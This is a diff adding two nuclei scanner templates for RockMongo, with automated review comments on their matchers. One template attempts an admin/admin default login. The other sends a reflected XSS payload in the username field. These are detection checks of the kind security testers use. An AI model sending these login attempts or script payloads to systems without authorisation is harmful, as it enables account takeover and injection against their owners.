diff --git a/default-logins/rockmongo/rockmongo-default-credentials.yaml b/default-logins/rockmongo/rockmongo-default-credentials.yaml
new file mode 100644
index 0000000000..22398d0a74
--- /dev/null
+++ b/default-logins/rockmongo/rockmongo-default-credentials.yaml
@@ -0,0 +1,31 @@
+id: rockmongo-default-credentials
+
+info:
+ name: Rockmongo Default Credentials
+ author: pikpikcu
+ severity: high
+ tags: rockmongo,dlogin
+
+requests:
+ - raw:
+ - |
+ POST /index.php?action=login.index HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Content-Type: application/x-www-form-urlencoded
+ Referer: {{Hostname}}/index.php?action=login.index
+
+ more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "Location: /index.php?action=admin.index&host=0"
+ - "Set-Cookie: ROCK_LANG="
+ part: header
+
+ - type: status
+ status:
+ - 302
diff --git a/vulnerabilities/other/rockmongo-xss.yaml b/vulnerabilities/other/rockmongo-xss.yaml
new file mode 100644
index 0000000000..d23d822656
--- /dev/null
+++ b/vulnerabilities/other/rockmongo-xss.yaml
@@ -0,0 +1,33 @@
+id: rockmongo-xss
+
+info:
+ name: RockMongo V1.1.8 XSS
+ author: pikpikcu
+ severity: medium
+ reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
+ tags: rockmongo,xss
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/index.php?action=login.index"
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ body: "more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - '">'
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'Content-Type: text/html'
+ part: header
\ No newline at end of file
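Review bot: In rockmongo-default-credentials.yaml the header word matcher lists two words without a `condition`, so nuclei's default `or` applies and a 302 that only carries `Set-Cookie: ROCK_LANG=` satisfies it; since the request itself sends `lang=en_us`, a rejected login may set that cookie as well (not verifiable from the diff). Adding `condition: and` under that matcher would also require the redirect to `/index.php?action=admin.index&host=0`, which is the actual evidence that `admin`/`admin` was accepted. Separately, the `Referer: {{Hostname}}/index.php?action=login.index` line has no scheme; `Referer: {{BaseURL}}/index.php?action=login.index` would send a well-formed URL. The `info` block would also benefit from a `description` and a `reference`, so a finding can be triaged and remediated without opening the template.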
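Review bot: In rockmongo-xss.yaml the body word matcher, as shown, is only `'">'`, a sequence present in almost any HTML document, so every target answering 200 with `Content-Type: text/html` would be reported whether or not the `username` value is reflected. The word should be the full decoded value that the request body sends, `'"><script>alert(document.domain)</script>'`, so that a match shows the input came back unescaped; if the tag was merely lost when this page was rendered, the template already does that. The file also ends without a trailing newline.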